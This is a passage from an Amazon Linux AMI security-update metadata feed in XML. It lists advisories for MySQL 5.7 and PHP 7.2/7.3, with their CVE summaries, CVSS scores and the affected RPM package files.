arch="x86_64"><filename>Packages/libxml2-static-2.9.1-6.4.41.amzn1.x86_64.rpm</filename></package><package name="libxml2" version="2.9.1" release="6.4.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-2.9.1-6.4.41.amzn1.x86_64.rpm</filename></package><package name="libxml2-debuginfo" version="2.9.1" release="6.4.41.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-debuginfo-2.9.1-6.4.41.amzn1.i686.rpm</filename></package><package name="libxml2-python26" version="2.9.1" release="6.4.41.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-python26-2.9.1-6.4.41.amzn1.i686.rpm</filename></package><package name="libxml2-python27" version="2.9.1" release="6.4.41.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-python27-2.9.1-6.4.41.amzn1.i686.rpm</filename></package><package name="libxml2-devel" version="2.9.1" release="6.4.41.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-devel-2.9.1-6.4.41.amzn1.i686.rpm</filename></package><package name="libxml2-static" version="2.9.1" release="6.4.41.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-static-2.9.1-6.4.41.amzn1.i686.rpm</filename></package><package name="libxml2" version="2.9.1" release="6.4.41.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-2.9.1-6.4.41.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1439</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1439: medium priority package update for mysql57</title><issued date="2020-10-26 18:14:00" /><updated date="2020-10-27 21:22:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-14576:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: UDF). Supported versions that are affected are 5.7.30 and prior and 8.0.20 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1865955: CVE-2020-14576 mysql: Server: UDF unspecified vulnerability (CPU Jul 2020)
CVE-2020-14559:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Information Schema). Supported versions that are affected are 5.6.48 and prior, 5.7.30 and prior and 8.0.20 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized read access to a subset of MySQL Server accessible data. CVSS 3.1 Base Score 4.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N).
1865951: CVE-2020-14559 mysql: Server: Information Schema unspecified vulnerability (CPU Jul 2020)
CVE-2020-14553:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Pluggable Auth). Supported versions that are affected are 5.7.30 and prior and 8.0.20 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.1 Base Score 4.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N).
1865950: CVE-2020-14553 mysql: Server: Pluggable Auth unspecified vulnerability (CPU Jul 2020)
CVE-2020-14550:
Vulnerability in the MySQL Client product of Oracle MySQL (component: C API). Supported versions that are affected are 5.6.48 and prior, 5.7.30 and prior and 8.0.20 and prior. Difficult to exploit vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Client. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Client. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H).
1865949: CVE-2020-14550 mysql: C API unspecified vulnerability (CPU Jul 2020)
CVE-2020-14547:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 5.7.30 and prior and 8.0.20 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1865948: CVE-2020-14547 mysql: Server: Optimizer unspecified vulnerability (CPU Jul 2020)
CVE-2020-14540:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DML). Supported versions that are affected are 5.7.30 and prior and 8.0.20 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1865947: CVE-2020-14540 mysql: Server: DML unspecified vulnerability (CPU Jul 2020)
CVE-2020-14539:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 5.6.48 and prior, 5.7.30 and prior and 8.0.20 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1865945: CVE-2020-14539 mysql: Server: Optimizer unspecified vulnerability (CPU Jul 2020)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14539" title="" id="CVE-2020-14539" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14540" title="" id="CVE-2020-14540" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14547" title="" id="CVE-2020-14547" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14550" title="" id="CVE-2020-14550" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14553" title="" id="CVE-2020-14553" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14559" title="" id="CVE-2020-14559" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14576" title="" id="CVE-2020-14576" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql57-libs" version="5.7.31" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-libs-5.7.31-1.16.amzn1.x86_64.rpm</filename></package><package name="mysql57-embedded" version="5.7.31" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-embedded-5.7.31-1.16.amzn1.x86_64.rpm</filename></package><package name="mysql57-common" version="5.7.31" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-common-5.7.31-1.16.amzn1.x86_64.rpm</filename></package><package name="mysql57-embedded-devel" version="5.7.31" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-embedded-devel-5.7.31-1.16.amzn1.x86_64.rpm</filename></package><package name="mysql57-errmsg" version="5.7.31" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-errmsg-5.7.31-1.16.amzn1.x86_64.rpm</filename></package><package name="mysql57-server" version="5.7.31" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-server-5.7.31-1.16.amzn1.x86_64.rpm</filename></package><package name="mysql57-debuginfo" version="5.7.31" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-debuginfo-5.7.31-1.16.amzn1.x86_64.rpm</filename></package><package name="mysql57-test" version="5.7.31" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-test-5.7.31-1.16.amzn1.x86_64.rpm</filename></package><package name="mysql57-devel" version="5.7.31" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-devel-5.7.31-1.16.amzn1.x86_64.rpm</filename></package><package name="mysql57" version="5.7.31" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-5.7.31-1.16.amzn1.x86_64.rpm</filename></package><package name="mysql57-devel" version="5.7.31" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-devel-5.7.31-1.16.amzn1.i686.rpm</filename></package><package name="mysql57" version="5.7.31" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-5.7.31-1.16.amzn1.i686.rpm</filename></package><package name="mysql57-libs" version="5.7.31" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-libs-5.7.31-1.16.amzn1.i686.rpm</filename></package><package name="mysql57-debuginfo" version="5.7.31" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-debuginfo-5.7.31-1.16.amzn1.i686.rpm</filename></package><package name="mysql57-embedded" version="5.7.31" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-embedded-5.7.31-1.16.amzn1.i686.rpm</filename></package><package name="mysql57-embedded-devel" version="5.7.31" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-embedded-devel-5.7.31-1.16.amzn1.i686.rpm</filename></package><package name="mysql57-server" version="5.7.31" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-server-5.7.31-1.16.amzn1.i686.rpm</filename></package><package name="mysql57-errmsg" version="5.7.31" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-errmsg-5.7.31-1.16.amzn1.i686.rpm</filename></package><package name="mysql57-test" version="5.7.31" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-test-5.7.31-1.16.amzn1.i686.rpm</filename></package><package name="mysql57-common" version="5.7.31" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-common-5.7.31-1.16.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1440</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1440: medium priority package update for php72 php73</title><issued date="2020-10-26 18:16:00" /><updated date="2020-10-27 21:20:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-7070:
In PHP versions 7.2.x below 7.2.34, 7.3.x below 7.3.23 and 7.4.x below 7.4.11, when PHP is processing incoming HTTP cookie values, the cookie names are url-decoded. This may lead to cookies with prefixes like __Host confused with cookies that decode to such prefix, thus leading to an attacker being able to forge cookie which is supposed to be secure. See also CVE-2020-8184 for more information.
1885738: CVE-2020-7070 php: PHP parses encoded cookie names so malicious `__Host-` cookies can be sent
CVE-2020-7069:
In PHP versions 7.2.x below 7.2.34, 7.3.x below 7.3.23 and 7.4.x below 7.4.11, when AES-CCM mode is used with openssl_encrypt() function with 12 bytes IV, only first 7 bytes of the IV is actually used. This can lead to both decreased security and incorrect encryption data.
1885735: CVE-2020-7069 php: wrong ciphertext/tag in AES-CCM encryption for a 12 bytes IV
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7069" title="" id="CVE-2020-7069" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7070" title="" id="CVE-2020-7070" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php72-bcmath" version="7.2.34" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-bcmath-7.2.34-1.26.amzn1.x86_64.rpm</filename></package><package name="php72-dba" version="7.2.34" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-dba-7.2.34-1.26.amzn1.x86_64.rpm</filename></package><package name="php72-gmp" version="7.2.34" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-gmp-7.2.34-1.26.amzn1.x86_64.rpm</filename></package><package name="php72-tidy" version="7.2.34" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-tidy-7.2.34-1.26.amzn1.x86_64.rpm</filename></package><package name="php72-devel" version="7.2.34" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-devel-7.2.34-1.26.amzn1.x86_64.rpm</filename></package><package name="php72-json" version="7.2.34" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-json-7.2.34-1.26.amzn1.x86_64.rpm</filename></package><package name="php72-pgsql" version="7.2.34" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pgsql-7.2.34-1.26.amzn1.x86_64.rpm</filename></package><package name="php72-pdo" version="7.2.34" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pdo-7.2.34-1.26.amzn1.x86_64.rpm</filename></package><package name="php72-pspell" version="7.2.34" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pspell-7.2.34-1.26.amzn1.x86_64.rpm</filename></package><package name="php72-intl" version="7.2.34" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-intl-7.2.34-1.26.amzn1.x86_64.rpm</filename></package><package name="php72-common" version="7.2.34" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-common-7.2.34-1.26.amzn1.x86_64.rpm</filename></package><package name="php72-odbc" version="7.2.34" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-odbc-7.2.34-1.26.amzn1.x86_64.rpm</filename></package><package name="php72-mbstring" version="7.2.34" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-mbstring-7.2.34-1.26.amzn1.x86_64.rpm</filename></package><package name="php72-debuginfo" version="7.2.34" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-debuginfo-7.2.34-1.26.amzn1.x86_64.rpm</filename></package><package name="php72-enchant" version="7.2.34" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-enchant-7.2.34-1.26.amzn1.x86_64.rpm</filename></package><package name="php72-soap" version="7.2.34" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-soap-7.2.34-1.26.amzn1.x86_64.rpm</filename></package><package name="php72-xmlrpc" version="7.2.34" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-xmlrpc-7.2.34-1.26.amzn1.x86_64.rpm</filename></package><package name="php72-recode" version="7.2.34" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-recode-7.2.34-1.26.amzn1.x86_64.rpm</filename></package><package name="php72-ldap" version="7.2.34" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-ldap-7.2.34-1.26.amzn1.x86_64.rpm</filename></package><package name="php72-opcache" version="7.2.34" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-opcache-7.2.34-1.26.amzn1.x86_64.rpm</filename></package><package name="php72-dbg" version="7.2.34" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-dbg-7.2.34-1.26.amzn1.x86_64.rpm</filename></package><package name="php72-mysqlnd" version="7.2.34" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-mysqlnd-7.2.34-1.26.amzn1.x86_64.rpm</filename></package><package name="php72-pdo-dblib" version="7.2.34" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pdo-dblib-7.2.34-1.26.amzn1.x86_64.rpm</filename></package><package name="php72-cli" version="7.2.34" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-cli-7.2.34-1.26.amzn1.x86_64.rpm</filename></package><package name="php72-snmp" version="7.2.34" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-snmp-7.2.34-1.26.amzn1.x86_64.rpm</filename></package><package name="php72-imap" version="7.2.34" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-imap-7.2.34-1.26.amzn1.x86_64.rpm</filename></package><package name="php72-process" version="7.2.34" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-process-7.2.34-1.26.amzn1.x86_64.rpm</filename></package><package name="php72-fpm" version="7.2.34" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-fpm-7.2.34-1.26.amzn1.x86_64.rpm</filename></package><package name="php72-gd" version="7.2.34" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-gd-7.2.34-1.26.amzn1.x86_64.rpm</filename></package><package name="php72-embedded" version="7.2.34" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-embedded-7.2.34-1.26.amzn1.x86_64.rpm</filename></package><package name="php72-xml" version="7.2.34" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-xml-7.2.34-1.26.amzn1.x86_64.rpm</filename></package><package name="php72" version="7.2.34" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-7.2.34-1.26.amzn1.x86_64.rpm</filename></package><package name="php72-devel" version="7.2.34" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php72-devel-7.2.34-1.26.amzn1.i686.rpm</filename></package><package name="php72-opcache" version="7.2.34" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php72-opcache-7.2.34-1.26.amzn1.i686.rpm</filename></package><package name="php72-intl" version="7.2.34" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php72-intl-7.2.34-1.26.amzn1.i686.rpm</filename></package><package name="php72-ldap" version="7.2.34" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php72-ldap-7.2.34-1.26.amzn1.i686.rpm</filename></package><package name="php72-bcmath" version="7.2.34" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php72-bcmath-7.2.34-1.26.amzn1.i686.rpm</filename></package><package name="php72-embedded" version="7.2.34" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php72-embedded-7.2.34-1.26.amzn1.i686.rpm</filename></package><package name="php72-xmlrpc" version="7.2.34" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php72-xmlrpc-7.2.34-1.26.amzn1.i686.rpm</filename></package><package name="php72-enchant" version="7.2.34" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php72-enchant-7.2.34-1.26.amzn1.i686.rpm</filename></package><package name="php72-mysqlnd" version="7.2.34" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php72-mysqlnd-7.2.34-1.26.amzn1.i686.rpm</filename></package><package name="php72-dba" version="7.2.34" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php72-dba-7.2.34-1.26.amzn1.i686.rpm</filename></package><package name="php72-tidy" version="7.2.34" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php72-tidy-7.2.34-1.26.amzn1.i686.rpm</filename></package><package name="php72-json" version="7.2.34" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php72-json-7.2.34-1.26.amzn1.i686.rpm</filename></package><package name="php72" version="7.2.34" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php72-7.2.34-1.26.amzn1.i686.rpm</filename></package><package name="php72-debuginfo" version="7.2.34" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php72-debuginfo-7.2.34-1.26.amzn1.i686.rpm</filename></package><package name="php72-soap" version="7.2.34" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php72-soap-7.2.34-1.26.amzn1.i686.rpm</filename></package><package name="php72-snmp" version="7.2.34" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php72-snmp-7.2.34-1.26.amzn1.i686.rpm</filename></package><package name="php72-imap" version="7.2.34" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php72-imap-7.2.34-1.26.amzn1.i686.rpm</filename></package><package name="php72-mbstring" version="7.2.34" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php72-mbstring-7.2.34-1.26.amzn1.i686.rpm</filename></package><package name="php72-odbc" version="7.2.34" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php72-odbc-7.2.34-1.26.amzn1.i686.rpm</filename></package><package name="php72-pdo-dblib" version="7.2.34" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pdo-dblib-7.2.34-1.26.amzn1.i686.rpm</filename></package><package name="php72-fpm" version="7.2.34" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php72-fpm-7.2.34-1.26.amzn1.i686.rpm</filename></package><package name="php72-process" version="7.2.34" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php72-process-7.2.34-1.26.amzn1.i686.rpm</filename></package><package name="php72-gmp" version="7.2.34" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php72-gmp-7.2.34-1.26.amzn1.i686.rpm</filename></package><package name="php72-gd" version="7.2.34" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php72-gd-7.2.34-1.26.amzn1.i686.rpm</filename></package><package name="php72-common" version="7.2.34" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php72-common-7.2.34-1.26.amzn1.i686.rpm</filename></package><package name="php72-pspell" version="7.2.34" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pspell-7.2.34-1.26.amzn1.i686.rpm</filename></package><package name="php72-pgsql" version="7.2.34" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pgsql-7.2.34-1.26.amzn1.i686.rpm</filename></package><package name="php72-cli" version="7.2.34" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php72-cli-7.2.34-1.26.amzn1.i686.rpm</filename></package><package name="php72-xml" version="7.2.34" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php72-xml-7.2.34-1.26.amzn1.i686.rpm</filename></package><package name="php72-pdo" version="7.2.34" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pdo-7.2.34-1.26.amzn1.i686.rpm</filename></package><package name="php72-recode" version="7.2.34" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php72-recode-7.2.34-1.26.amzn1.i686.rpm</filename></package><package name="php72-dbg" version="7.2.34" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php72-dbg-7.2.34-1.26.amzn1.i686.rpm</filename></package><package name="php73-tidy" version="7.3.23" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-tidy-7.3.23-1.29.amzn1.x86_64.rpm</filename></package><package name="php73" version="7.3.23" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-7.3.23-1.29.amzn1.x86_64.rpm</filename></package><package name="php73-embedded" version="7.3.23" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-embedded-7.3.23-1.29.amzn1.x86_64.rpm</filename></package><package name="php73-bcmath" version="7.3.23" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-bcmath-7.3.23-1.29.amzn1.x86_64.rpm</filename></package><package name="php73-mbstring" version="7.3.23" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-mbstring-7.3.23-1.29.amzn1.x86_64.rpm</filename></package><package name="php73-process" version="7.3.23" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-process-7.3.23-1.29.amzn1.x86_64.rpm</filename></package><package name="php73-recode" version="7.3.23" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-recode-7.3.23-1.29.amzn1.x86_64.rpm</filename></package><package name="php73-pgsql" version="7.3.23" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pgsql-7.3.23-1.29.amzn1.x86_64.rpm</filename></package><package name="php73-pspell" version="7.3.23" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pspell-7.3.23-1.29.amzn1.x86_64.rpm</filename></package><package name="php73-fpm" version="7.3.23" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-fpm-7.3.23-1.29.amzn1.x86_64.rpm</filename></package><package name="php73-odbc" version="7.3.23" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-odbc-7.3.23-1.29.amzn1.x86_64.rpm</filename></package><package name="php73-pdo-dblib" version="7.3.23" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pdo-dblib-7.3.23-1.29.amzn1.x86_64.rpm</filename></package><package name="php73-devel" version="7.3.23" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-devel-7.3.23-1.29.amzn1.x86_64.rpm</filename></package><package name="php73-dbg" version="7.3.23" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-dbg-7.3.23-1.29.amzn1.x86_64.rpm</filename></package><package name="php73-xml" version="7.3.23" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-xml-7.3.23-1.29.amzn1.x86_64.rpm</filename></package><package name="php73-enchant" version="7.3.23" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-enchant-7.3.23-1.29.amzn1.x86_64.rpm</filename></package><package name="php73-imap" version="7.3.23" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-imap-7.3.23-1.29.amzn1.x86_64.rpm</filename></package><package name="php73-pdo" version="7.3.23" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pdo-7.3.23-1.29.amzn1.x86_64.rpm</filename></package><package name="php73-mysqlnd" version="7.3.23" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-mysqlnd-7.3.23-1.29.amzn1.x86_64.rpm</filename></package><package name="php73-soap" version="7.3.23" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-soap-7.3.23-1.29.amzn1.x86_64.rpm</filename></package><package name="php73-snmp" version="7.3.23" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-snmp-7.3.23-1.29.amzn1.x86_64.rpm</filename></package><package name="php73-json" version="7.3.23" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-json-7.3.23-1.29.amzn1.x86_64.rpm</filename></package><package name="php73-ldap" version="7.3.23" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-ldap-7.3.23-1.29.amzn1.x86_64.rpm</filename></package><package name="php73-gd" version="7.3.23" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-gd-7.3.23-1.29.amzn1.x86_64.rpm</filename></package><package name="php73-intl" version="7.3.23" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-intl-7.3.23-1.29.amzn1.x86_64.rpm</filename></package><package name="php73-debuginfo" version="7.3.23" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-debuginfo-7.3.23-1.29.amzn1.x86_64.rpm</filename></package><package name="php73-common" version="7.3.23" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-common-7.3.23-1.29.amzn1.x86_64.rpm</filename></package><package name="php73-cli" version="7.3.23" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-cli-7.3.23-1.29.amzn1.x86_64.rpm</filename></package><package name="php73-xmlrpc" version="7.3.23" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-xmlrpc-7.3.23-1.29.amzn1.x86_64.rpm</filename></package><package name="php73-dba" version="7.3.23" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-dba-7.3.23-1.29.amzn1.x86_64.rpm</filename></package><package name="php73-gmp" version="7.3.23" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-gmp-7.3.23-1.29.amzn1.x86_64.rpm</filename></package><package name="php73-opcache" version="7.3.23" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-opcache-7.3.23-1.29.amzn1.x86_64.rpm</filename></package><package name="php73-common" version="7.3.23" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php73-common-7.3.23-1.29.amzn1.i686.rpm</filename></package><package name="php73-gd" version="7.3.23" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php73-gd-7.3.23-1.29.amzn1.i686.rpm</filename></package><package name="php73-pdo" version="7.3.23" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pdo-7.3.23-1.29.amzn1.i686.rpm</filename></package><package name="php73-dbg" version="7.3.23" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php73-dbg-7.3.23-1.29.amzn1.i686.rpm</filename></package><package name="php73" version="7.3.23" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php73-7.3.23-1.29.amzn1.i686.rpm</filename></package><package name="php73-recode" version="7.3.23" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php73-recode-7.3.23-1.29.amzn1.i686.rpm</filename></package><package name="php73-embedded" version="7.3.23" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php73-embedded-7.3.23-1.29.amzn1.i686.rpm</filename></package><package name="php73-gmp" version="7.3.23" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php73-gmp-7.3.23-1.29.amzn1.i686.rpm</filename></package><package name="php73-devel" version="7.3.23" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php73-devel-7.3.23-1.29.amzn1.i686.rpm</filename></package><package name="php73-dba" version="7.3.23" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php73-dba-7.3.23-1.29.amzn1.i686.rpm</filename></package><package 